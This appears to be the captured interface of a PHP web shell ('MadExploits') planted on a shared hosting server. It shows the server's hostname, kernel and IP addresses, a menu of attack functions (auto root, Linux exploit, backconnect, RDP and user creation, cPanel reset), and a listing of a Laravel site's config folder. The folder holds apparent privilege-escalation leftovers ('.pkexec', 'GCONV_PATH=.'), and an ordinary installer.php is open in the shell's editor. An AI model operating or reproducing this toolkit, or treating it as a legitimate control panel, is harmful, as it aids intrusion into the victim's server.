Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
doctor.tradesense.co.ke /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
9.23
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
cors.php
823
B
-rw-r--r--
database.php
4.94
KB
-rw-r--r--
dompdf.php
10.14
KB
-rw-r--r--
filesystems.php
2.63
KB
-rw-r--r--
flare.php
1.38
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
ignition.php
4.35
KB
-rw-r--r--
installer.php
5.16
KB
-rw-r--r--
logging.php
2.83
KB
-rw-r--r--
mail.php
3.29
KB
-rw-r--r--
nexmo.php
2.4
KB
-rw-r--r--
purifier.php
4.25
KB
-rw-r--r--
queue.php
2.7
KB
-rw-r--r--
services.php
950
B
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
tinker.php
1.47
KB
-rw-r--r--
trustedproxy.php
1.67
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : installer.php
<?php return [ /* |-------------------------------------------------------------------------- | Server Requirements |-------------------------------------------------------------------------- | | This is the default Laravel server requirements, you can add as many | as your application require, we check if the extension is enabled | by looping through the array and run "extension_loaded" on it. | */ 'core' => [ 'minPhpVersion' => '7.0.0', ], 'final' => [ 'key' => true, 'publish' => false, ], 'requirements' => [ 'php' => [ 'openssl', 'pdo', 'mbstring', 'tokenizer', 'JSON', 'cURL', ], 'apache' => [ 'mod_rewrite', ], ], /* |-------------------------------------------------------------------------- | Folders Permissions |-------------------------------------------------------------------------- | | This is the default Laravel folders permissions, if your application | requires more permissions just add them to the array list bellow. | */ 'permissions' => [ 'storage/framework/' => '775', 'storage/logs/' => '775', 'bootstrap/cache/' => '775', ], /* |-------------------------------------------------------------------------- | Environment Form Wizard Validation Rules & Messages |-------------------------------------------------------------------------- | | This are the default form field validation rules. Available Rules: | https://laravel.com/docs/5.4/validation#available-validation-rules | */ 'environment' => [ 'form' => [ 'rules' => [ 'app_name' => 'required|string|max:50', 'environment' => 'required|string|max:50', 'environment_custom' => 'required_if:environment,other|max:50', 'app_debug' => 'required|string', 'app_log_level' => 'required|string|max:50', 'app_url' => 'required|url', 'database_connection' => 'required|string|max:50', 'database_hostname' => 'required|string|max:50', 'database_port' => 'required|numeric', 'database_name' => 'required|string|max:50', 'database_username' => 'required|string|max:50', 'database_password' => 'nullable|string|max:50', 'broadcast_driver' => 'required|string|max:50', 'cache_driver' => 'required|string|max:50', 'session_driver' => 'required|string|max:50', 'queue_driver' => 'required|string|max:50', 'redis_hostname' => 'required|string|max:50', 'redis_password' => 'required|string|max:50', 'redis_port' => 'required|numeric', 'mail_driver' => 'required|string|max:50', 'mail_host' => 'required|string|max:50', 'mail_port' => 'required|string|max:50', 'mail_username' => 'required|string|max:50', 'mail_password' => 'required|string|max:50', 'mail_encryption' => 'required|string|max:50', 'pusher_app_id' => 'max:50', 'pusher_app_key' => 'max:50', 'pusher_app_secret' => 'max:50', ], ], ], /* |-------------------------------------------------------------------------- | Installed Middleware Options |-------------------------------------------------------------------------- | Different available status switch configuration for the | canInstall middleware located in `canInstall.php`. | */ 'installed' => [ 'redirectOptions' => [ 'route' => [ 'name' => 'welcome', 'data' => [], ], 'abort' => [ 'type' => '404', ], 'dump' => [ 'data' => 'Dumping a not found message.', ], ], ], /* |-------------------------------------------------------------------------- | Selected Installed Middleware Option |-------------------------------------------------------------------------- | The selected option fo what happens when an installer instance has been | Default output is to `/resources/views/error/404.blade.php` if none. | The available middleware options include: | route, abort, dump, 404, default, '' | */ 'installedAlreadyAction' => '', /* |-------------------------------------------------------------------------- | Updater Enabled |-------------------------------------------------------------------------- | Can the application run the '/update' route with the migrations. | The default option is set to False if none is present. | Boolean value | */ 'updaterEnabled' => 'true', ];
Close